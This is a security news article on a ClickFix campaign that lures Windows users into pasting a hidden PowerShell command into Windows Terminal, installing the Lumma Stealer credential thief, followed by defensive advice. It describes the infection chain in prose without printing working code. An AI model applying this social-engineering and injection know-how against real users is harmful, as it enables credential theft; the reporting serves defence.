New ClickFix Attack leverages Windows Terminal for Payload Execution

Cybersecurity researchers have uncovered a new wave of ClickFix attacks that now exploit Windows Terminal to deliver malicious payloads directly onto victim machines.

Unlike earlier iterations of this social engineering technique, which relied on the Windows Run dialog, this latest campaign leads users into opening a privileged command environment themselves, making it harder to detect and more believable to ordinary users.

ClickFix first appeared in early 2024, when researchers at Proofpoint spotted it delivering fake browser error prompts that tricked users into running harmful commands.

The technique spread fast, and ESET has since recorded a 517% surge in ClickFix attacks throughout 2025, placing it second only to phishing as a global attack vector.

Attackers typically craft fake CAPTCHA pages, phony troubleshooting notices, or urgent security alerts, all designed to pressure victims into reacting before they stop to question the request.

Microsoft Threat Intelligence analysts identified a widespread ClickFix campaign in February 2026 that specifically targeted Windows Terminal as its new execution environment.

Rather than directing victims to the traditional Run dialog through Win + R, this campaign told them to use the Windows + X shortcut followed by “I” to launch Windows Terminal directly.

This approach let attackers sidestep security tools built to flag Run dialog misuse, while placing victims inside a command-line environment that resembles routine IT work.

The damage caused by this campaign is real and measurable. According to Microsoft’s 2025 Digital Defense Report, ClickFix is now the leading initial access method, responsible for 47% of all attacks tracked by Microsoft Defender Experts, outpacing traditional phishing at 35%.

The final payload in this latest campaign is Lumma Stealer, a credential-harvesting malware designed to extract saved usernames, passwords, and sensitive browser data from Chrome and Edge.

This campaign is specific to Windows users, and since it abuses human behavior rather than a software flaw, no traditional software patch exists. Security awareness and strict policy controls remain the most effective defenses against this type of attack.

How the Infection Unfolds

The attack begins the moment a victim visits a compromised or malicious website. Hidden JavaScript running behind the page silently copies a hex-encoded, XOR-compressed PowerShell command into the user’s clipboard without any visible indication.

A fake CAPTCHA or verification prompt then appears on screen, impersonating trusted brands like Cloudflare or Microsoft, instructing the user to open Windows Terminal and paste what is in the clipboard to “fix” a supposed issue.

Once the command lands inside Windows Terminal, a PowerShell process decodes the compressed script entirely in memory and begins making outbound connections to attacker-controlled servers.

It downloads a renamed 7-Zip executable and a ZIP archive containing the next stage of the attack. The file is extracted and executed silently, with no visible prompts appearing on screen, leaving the victim with no reason to suspect anything has gone wrong.

The malware then establishes persistence by writing a scheduled task that runs each time the system restarts. Lumma Stealer is dropped into C:ProgramDataapp_configctjb and uses QueueUserAPC() injection to insert itself into active browser processes, including chrome.exe and msedge.exe.

Once embedded inside these processes, it reads Login Data and Web Data files stored by the browser, harvesting saved credentials and sensitive autofill entries before sending everything off to the attacker’s remote infrastructure.

Detection is made harder because wt.exe is a trusted system component on many Windows machines. Security monitoring tools may not immediately flag PowerShell activity spawned from Windows Terminal, giving the attacker undetected time to complete the full infection chain.

To reduce exposure to this threat, organizations should train employees to never paste commands into any terminal prompted by a website. Windows Terminal and PowerShell should be restricted to administrative accounts through Group Policy.

Security teams should regularly inspect registry keys under HKCUSoftwareMicrosoftWindowsCurrentVersionRun and review Windows Task Scheduler for unrecognized scheduled tasks.

Endpoint detection tools should be configured to monitor and alert on PowerShell processes spawned by wt.exe, and antimalware definitions should be updated regularly across all endpoints.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.